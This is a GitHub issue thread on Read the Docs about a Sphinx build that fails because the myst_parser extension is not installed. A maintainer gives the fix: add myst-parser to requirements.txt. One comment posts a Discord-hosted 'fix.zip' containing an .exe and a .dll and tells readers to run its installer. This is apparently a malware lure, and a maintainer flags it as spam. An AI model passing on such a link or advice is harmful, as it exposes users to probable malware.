### ISSUE TITLE
Read The Docs dosnt support Myst Parser

### ISSUE THREAD

**Issue by Skrillx13** [readthedocs/readthedocs.org#11578]
## Details

I was told to put my issue here at the issue tracker so:

I have an issue with this Sphinx project I am importing. Basically, I use this Sphinx extension called Myst Parser. Link is 

https://myst-parser.readthedocs.io/en/latest/index.html.

What this extension does, it that it makes Markdown files compatible with Sphinx, as I prefer Markdown over reStructuredText. However, when I try to build the docs, I get hit with a few errors, and end up with

Extension error:
Could not import extension myst_parser (exception: No module named 'myst_parser')

Is there a possible solution to this? Thanks 

**Read the Docs project URL:** https://readthedocs.org/projects/doc-strings/

**Read the Docs username:** https://readthedocs.org/profiles/skrillx/

## Expected Result

I had to resolves a few errors such as taking the docs files out of the source folder, but I expected it to work after resolving everything.

## Actual Result

Got hit with a bunch of errors, and the result is me getting a message saying "could not import extension myst_parser" 

Additional: I also have a few extra extensions installed such as the Sphinx auto build Dev server extension. That extension has it's own error, but I was wondering if the build will also fail because of that.

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Skrillx13** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

uhh sorry but what am i supposed to do with this? i expanded the zip file and there are two files "msvcp.dll", which i don't have a application to open, and "ranlib.exe" which opens wine crossover? Also no idea if this helps but i am using a macbook instead of a windows computer so yeah

**Comment by humitos** [comment]
> try this

not sure where did you get that reply, but that looks to be spam.

**Comment by humitos** [comment]
> Could not import extension myst_parser (exception: No module named 'myst_parser')

It seems that you are not installing `myst-parser` Python package in the environment. You should add `myst-parser` to your `requirements.txt` file. That should do the trick.

Let me know if that works.
